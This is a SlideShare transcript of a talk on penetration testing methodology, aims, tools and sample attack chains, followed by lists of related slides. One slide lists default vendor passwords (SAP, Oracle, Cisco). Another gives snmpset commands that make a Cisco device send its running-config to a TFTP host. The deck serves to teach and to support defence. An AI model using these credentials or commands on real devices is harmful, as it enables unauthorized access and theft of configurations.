SlideShare a Scribd company logo
Penetration testing What’s this? Dmitry Evteev  ( Positive  Technologies)
Penetration testing internals Penetration testing  !=  simulation of (un)real  attacker  activities Penetration testing  !=  instrumental scanning with manual vulnerability verification Penetration testing  – is a complex of activities aimed to estimate current security process status; is a testing of protection bypassing; is one of security audit methods.
Methodology On the one hand,   the following best practices are used: Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … On the other hand, the following standards are used: Center of Internet Security (CIS) guides ISO 2700x series standards  …
Abilities Protection mechanism   N … X Incident management Some activities were detected but not identified as an attack . 2 Protection mechanism N … X
Aims High-level Internal policy  ( pentest as an instrument of pressure ) Estimation of current security processes Should be done  ( compliance ) Technological Get unauthorized access to internal network from the Internet Gain maximum privileges in main infrastructure systems  ( Active Directory, network hardware ,  DBMS ,  ERP, etc. ) Get access to certain information resources Get access to certain data  ( information )
Approaches Perimeter pentest  ( with further attacks in internal network ) With or without administrator awareness Wireless network security analysis Internal pentest From average user working station From chosen network segment Certain information system component testing  ( security analysis ) Black, Grey and White Box Assessment of employee awareness in information security
Real attack VS penetration testing For direct executor pentset is HACKING ! Limitations Compliance with Russian Federation legislation Limited time Minimum impact No testing like DDoS Inconveniences Coordination of actions  ( it can run into a very absurd extreme !) Responsibility/Punctuality Advantages Do not need to hide the activities Simplify the network perimeter identification process A possibility to use Grey and White Box methods
Instruments Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Browser ,  notepad …
web application security problem The most frequent web application vulnerabilities detected by “Black Box” method  ( 2009 statistics ,  http://ptsecurity.ru/analytics.asp )
Pentest example: web applications What is web application pentest by BlackBox method? (real world) web server auditor working station Check  1 Check   N Vulnerability is detected Vulnerability  1:  password bruteforce Impact:  access to application  ( with limited privileges ) Vulnerability  2: SQL  injection Impact:  file reading only  (magic quotes  option is enabled ) Vulnerability is detected Vulnerability  3:  path traversal Impact:  file reading only  ( potentially  LFI) Vulnerability  4:  predictable identifier of loaded file Vulnerability  3 +  Vulnerability  4 = Impact:  commands execution on server Next step  –  FURTHER ATTACK
Weak password problem The recommended password policy is used What is domain administrator password? (coincide with login)
Pentest example: Password bruteforce  ( defaults ) Well known admin:123456 Administrator:P@ssw0rd … SAP (DIAG)  SAP*: 06071992, PASS mandants :   000, 001, 066,  all new (RFC)  SAPCPIC: ADMIN mandants  :000, 001, 066,  all new … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …
Pentest example: Hello, Pavlik :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
The problem of access control Network access Network architecture  ( DMZ ,  technological network ,  user segment ,  testing environment ) Remote network access Data access Shared resources  ( password in clear text ,  data backup copy ,  different sensitive data ) Web applications ,  DBMS ,  ERP
The problem of access control Division of privileges among administrators Users with extended privileges Services  (!)  with more than required access level General problem of identifiers management
Pentest example:   Use of vulnerabilities CANVAS && Metasploit
Pentest example: Privilege Extension in   Active Directory Version  1 : Password bruteforce Version  2 : Vulnerabilities in controller domain services Version  3 : Pass-the-hash attack Version 4:   Create new user from domain computer Version  5 : Conduct attack  « Poisoning ARP cash » ( for example ,  hijack RDP session, lower authentication level to LM ) Version 6: NTLM Relay attack Version 7: Find and restore system state domain  ( for example ,  after successful attack on backup server ) Version  8 : Get extended privileges owing to other systems  ( for example ,  control items in company’s root DNS ) Version  9 :   Get extended privileges via other systems’ vulnerabilities  ( passwords are stored with reversible encryption ,  insecure protocols are used, etc. ) Version N …
Pentest example: Security analysis Network scanning Password is bruteforced ! Exploitation of SQL Injection Command execution on server Privilege gaining Internal resources attack Internal   pentest Install MaxPatrol scanner Find vulnerabilities Exploit vulnerabilities Move to network of the Head office Conduct attacks on Head office resources Get maximum privileges in the whole network !
Pentest example: Security analysis
Pentest example:   Wireless networks
Pentest example:   Assessment of awareness program efficiency Send provocative messages via e-mail Send provocative messages via  ICQ ( and other  IM) Distribute data media with provocative messages  Question employees Talks  ( by telephone ,  skype )
Pentest example:   Example of a set of checks Note description Attack Monitored events A note from   authority   with attached executable file . Spread of network worms . System infection with Trojan horse . Open the mailbox . Execute the attached file . A note from   internal person with link to web site .  The link points to an executable file .  Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Load file from w eb  server . Execute the file . A note from authority   with link to web site . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Follow the link .
Pentest example:   Assessment of awareness program effeciency Users that follow the link (only 1 pentest) Users that follow the link (regular pentest)
Conclusions Penetration testing –  is a number of activities that allows to make efficient assessment of current security processes Penetration testing –  is search and use of flows in security processes vulnerability management configuration management incident management security management of web applications, DBMS ,  ERP, wire and wireless networks, etc. etc.
Thank you for your attention !  Any questions?  [email_address] http://devteev.blogspot.com/

More Related Content

What's hot

THOR Apt Scanner
THOR Apt ScannerTHOR Apt Scanner
THOR Apt Scanner
Florian Roth
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunter
Andrew McNicol
 
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat Security Conference
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
Prakashchand Suthar
 
Basic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareBasic Dynamic Analysis of Malware
Basic Dynamic Analysis of Malware
Natraj G
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPoint
Andrew McNicol
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysis
Chong-Kuan Chen
 
2012 S&P Paper Reading Session1
2012 S&P Paper Reading Session12012 S&P Paper Reading Session1
2012 S&P Paper Reading Session1
Chong-Kuan Chen
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
Paul Melson
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathers
Andrew McNicol
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh
Bipin Upadhyay
 
My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode review
Anant Shrivastava
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
Jason Lang
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
Andrew McNicol
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPoint
Andrew McNicol
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
NotSoSecure Global Services
 
Purple team is awesome
Purple team is awesomePurple team is awesome
Purple team is awesome
Sumedt Jitpukdebodin
 

What's hot (20)

THOR Apt Scanner
THOR Apt ScannerTHOR Apt Scanner
THOR Apt Scanner
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunter
 
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Basic Dynamic Analysis of Malware
Basic Dynamic Analysis of MalwareBasic Dynamic Analysis of Malware
Basic Dynamic Analysis of Malware
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPoint
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysis
 
2012 S&P Paper Reading Session1
2012 S&P Paper Reading Session12012 S&P Paper Reading Session1
2012 S&P Paper Reading Session1
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
BSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathersBSides_Charm2015_Info sec hunters_gathers
BSides_Charm2015_Info sec hunters_gathers
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh
 
My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode review
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPoint
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Purple team is awesome
Purple team is awesomePurple team is awesome
Purple team is awesome
 

Viewers also liked

Penetration testing
Penetration testingPenetration testing
Penetration testing
Ammar WK
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
 
Segurança no Desenvolvimento de Software
Segurança no Desenvolvimento de SoftwareSegurança no Desenvolvimento de Software
Segurança no Desenvolvimento de Software
Marcelo Fleury
 
2016 10 pt kz качалин
2016 10 pt kz качалин2016 10 pt kz качалин
2016 10 pt kz качалин
Diana Frolova
 
Современные российские средства защиты информации
Современные российские средства защиты информацииСовременные российские средства защиты информации
Современные российские средства защиты информации
DialogueScience
 
Биография сетевого периметра в картинках
Биография сетевого периметра в картинкахБиография сетевого периметра в картинках
Биография сетевого периметра в картинках
Namik Heydarov
 
Positive Technologies. Григорий Тимофеев. "Позитивные технологии обеспечения ИБ"
Positive Technologies. Григорий Тимофеев. "Позитивные технологии обеспечения ИБ"Positive Technologies. Григорий Тимофеев. "Позитивные технологии обеспечения ИБ"
Positive Technologies. Григорий Тимофеев. "Позитивные технологии обеспечения ИБ"
Expolink
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
Web application Testing
Web application TestingWeb application Testing
Web application Testing
OWASP Foundation
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Hanaysha
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
NetSPI
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inVulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements in
Keith G. Tidball
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
NetSPI
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
NetSPI
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
NetSPI
 
Сравнение ТОП 5 SIEM РФ
Сравнение ТОП 5 SIEM РФСравнение ТОП 5 SIEM РФ
Сравнение ТОП 5 SIEM РФ
Pete Kuzeev
 
Oss tmm
Oss tmmOss tmm
OSS TMM
OSS TMMOSS TMM
Infographic: Penetration Testing - A Look into a Full Pen Test Campaign
Infographic: Penetration Testing - A Look into a Full Pen Test CampaignInfographic: Penetration Testing - A Look into a Full Pen Test Campaign
Infographic: Penetration Testing - A Look into a Full Pen Test Campaign
Pratum
 
11. wireless-penetration-testing-training-cyber51
11. wireless-penetration-testing-training-cyber5111. wireless-penetration-testing-training-cyber51
11. wireless-penetration-testing-training-cyber51
Doree Garcia, CCNA, OSWP
 

Viewers also liked (20)

Penetration testing
Penetration testingPenetration testing
Penetration testing
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Segurança no Desenvolvimento de Software
Segurança no Desenvolvimento de SoftwareSegurança no Desenvolvimento de Software
Segurança no Desenvolvimento de Software
 
2016 10 pt kz качалин
2016 10 pt kz качалин2016 10 pt kz качалин
2016 10 pt kz качалин
 
Современные российские средства защиты информации
Современные российские средства защиты информацииСовременные российские средства защиты информации
Современные российские средства защиты информации
 
Биография сетевого периметра в картинках
Биография сетевого периметра в картинкахБиография сетевого периметра в картинках
Биография сетевого периметра в картинках
 
Positive Technologies. Григорий Тимофеев. "Позитивные технологии обеспечения ИБ"
Positive Technologies. Григорий Тимофеев. "Позитивные технологии обеспечения ИБ"Positive Technologies. Григорий Тимофеев. "Позитивные технологии обеспечения ИБ"
Positive Technologies. Григорий Тимофеев. "Позитивные технологии обеспечения ИБ"
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Web application Testing
Web application TestingWeb application Testing
Web application Testing
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
 
Attack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration TestingAttack All The Layers - What's Working in Penetration Testing
Attack All The Layers - What's Working in Penetration Testing
 
Vulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements inVulnerability Assessment and Rapid Warning System Enhancements in
Vulnerability Assessment and Rapid Warning System Enhancements in
 
Introduction to Windows Dictionary Attacks
Introduction to Windows Dictionary AttacksIntroduction to Windows Dictionary Attacks
Introduction to Windows Dictionary Attacks
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
 
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
Application Risk Prioritization - Overview - Secure360 2015 - Part 1 of 2
 
Сравнение ТОП 5 SIEM РФ
Сравнение ТОП 5 SIEM РФСравнение ТОП 5 SIEM РФ
Сравнение ТОП 5 SIEM РФ
 
Oss tmm
Oss tmmOss tmm
Oss tmm
 
OSS TMM
OSS TMMOSS TMM
OSS TMM
 
Infographic: Penetration Testing - A Look into a Full Pen Test Campaign
Infographic: Penetration Testing - A Look into a Full Pen Test CampaignInfographic: Penetration Testing - A Look into a Full Pen Test Campaign
Infographic: Penetration Testing - A Look into a Full Pen Test Campaign
 
11. wireless-penetration-testing-training-cyber51
11. wireless-penetration-testing-training-cyber5111. wireless-penetration-testing-training-cyber51
11. wireless-penetration-testing-training-cyber51
 

Similar to Penetration testing, What’s this?

Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Raghav Bisht
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri
 
How to protect your corporate from advanced attacks
How to protect your corporate from advanced attacksHow to protect your corporate from advanced attacks
How to protect your corporate from advanced attacks
Microsoft
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
ClubHack
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
ClubHack
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
amiable_indian
 
Windows network security
Windows network securityWindows network security
Windows network security
Information Technology
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
Cyber warfare introduction
Cyber warfare introductionCyber warfare introduction
Cyber warfare introduction
jagadeesh katla
 
Penetration testing
Penetration testing Penetration testing
Penetration testing
PTC
 
Redefining Endpoint Security
Redefining Endpoint SecurityRedefining Endpoint Security
Redefining Endpoint Security
Burak DAYIOGLU
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
Linuxmalaysia Malaysia
 
Windows network
Windows networkWindows network
Windows network
Jithesh Nair
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core Impact
Tom Eston
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht
 
NetWitness
NetWitnessNetWitness
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
shreyng
 
Novetta Cyber Analytics
Novetta Cyber AnalyticsNovetta Cyber Analytics
Novetta Cyber Analytics
Novetta
 
Ph d proposal_20070809
Ph d proposal_20070809Ph d proposal_20070809
Ph d proposal_20070809
Todd Deshane
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
Dr. Anish Cheriyan (PhD)
 

Similar to Penetration testing, What’s this? (20)

Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
 
How to protect your corporate from advanced attacks
How to protect your corporate from advanced attacksHow to protect your corporate from advanced attacks
How to protect your corporate from advanced attacks
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 
Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008Kunal - Introduction to backtrack - ClubHack2008
Kunal - Introduction to backtrack - ClubHack2008
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Windows network security
Windows network securityWindows network security
Windows network security
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
Cyber warfare introduction
Cyber warfare introductionCyber warfare introduction
Cyber warfare introduction
 
Penetration testing
Penetration testing Penetration testing
Penetration testing
 
Redefining Endpoint Security
Redefining Endpoint SecurityRedefining Endpoint Security
Redefining Endpoint Security
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Windows network
Windows networkWindows network
Windows network
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core Impact
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
 
NetWitness
NetWitnessNetWitness
NetWitness
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
 
Novetta Cyber Analytics
Novetta Cyber AnalyticsNovetta Cyber Analytics
Novetta Cyber Analytics
 
Ph d proposal_20070809
Ph d proposal_20070809Ph d proposal_20070809
Ph d proposal_20070809
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
 

More from Dmitry Evteev

Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...
Dmitry Evteev
 
penetest VS. APT
penetest VS. APTpenetest VS. APT
penetest VS. APT
Dmitry Evteev
 
Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.
Dmitry Evteev
 
Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...
Dmitry Evteev
 
Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Реальные опасности виртуального мира.
Реальные опасности виртуального мира.
Dmitry Evteev
 
Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.
Dmitry Evteev
 
Демонстрация атаки на ДБО
Демонстрация атаки на ДБОДемонстрация атаки на ДБО
Демонстрация атаки на ДБО
Dmitry Evteev
 
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
Dmitry Evteev
 
Типовые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских системТиповые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских систем
Dmitry Evteev
 
Услуги PT для банков
Услуги PT для банковУслуги PT для банков
Услуги PT для банков
Dmitry Evteev
 
PHDays 2012: Future Now
PHDays 2012: Future NowPHDays 2012: Future Now
PHDays 2012: Future Now
Dmitry Evteev
 
Такой (не)безопасный веб
Такой (не)безопасный вебТакой (не)безопасный веб
Такой (не)безопасный веб
Dmitry Evteev
 
Собираем команду хакеров
Собираем команду хакеровСобираем команду хакеров
Собираем команду хакеров
Dmitry Evteev
 
Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)
Dmitry Evteev
 
Тестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftТестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях Microsoft
Dmitry Evteev
 
PHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это былоPHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это было
Dmitry Evteev
 
Как взламывают сети государственных учреждений
Как взламывают сети государственных учрежденийКак взламывают сети государственных учреждений
Как взламывают сети государственных учреждений
Dmitry Evteev
 
Введение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложенийВведение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложений
Dmitry Evteev
 
Практика проведения DDoS-тестирований
Практика проведения DDoS-тестированийПрактика проведения DDoS-тестирований
Практика проведения DDoS-тестирований
Dmitry Evteev
 
Мобильный офис глазами пентестера
Мобильный офис глазами пентестераМобильный офис глазами пентестера
Мобильный офис глазами пентестера
Dmitry Evteev
 

More from Dmitry Evteev (20)

Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...
 
penetest VS. APT
penetest VS. APTpenetest VS. APT
penetest VS. APT
 
Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.
 
Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...
 
Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Реальные опасности виртуального мира.
Реальные опасности виртуального мира.
 
Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.
 
Демонстрация атаки на ДБО
Демонстрация атаки на ДБОДемонстрация атаки на ДБО
Демонстрация атаки на ДБО
 
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...История из жизни. Демонстрация работы реального злоумышленника на примере ата...
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
 
Типовые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских системТиповые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских систем
 
Услуги PT для банков
Услуги PT для банковУслуги PT для банков
Услуги PT для банков
 
PHDays 2012: Future Now
PHDays 2012: Future NowPHDays 2012: Future Now
PHDays 2012: Future Now
 
Такой (не)безопасный веб
Такой (не)безопасный вебТакой (не)безопасный веб
Такой (не)безопасный веб
 
Собираем команду хакеров
Собираем команду хакеровСобираем команду хакеров
Собираем команду хакеров
 
Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)
 
Тестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftТестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях Microsoft
 
PHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это былоPHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это было
 
Как взламывают сети государственных учреждений
Как взламывают сети государственных учрежденийКак взламывают сети государственных учреждений
Как взламывают сети государственных учреждений
 
Введение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложенийВведение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложений
 
Практика проведения DDoS-тестирований
Практика проведения DDoS-тестированийПрактика проведения DDoS-тестирований
Практика проведения DDoS-тестирований
 
Мобильный офис глазами пентестера
Мобильный офис глазами пентестераМобильный офис глазами пентестера
Мобильный офис глазами пентестера
 

Recently uploaded

find out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challengesfind out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challenges
huseindihon
 
Choose our Linux Web Hosting for a seamless and successful online presence
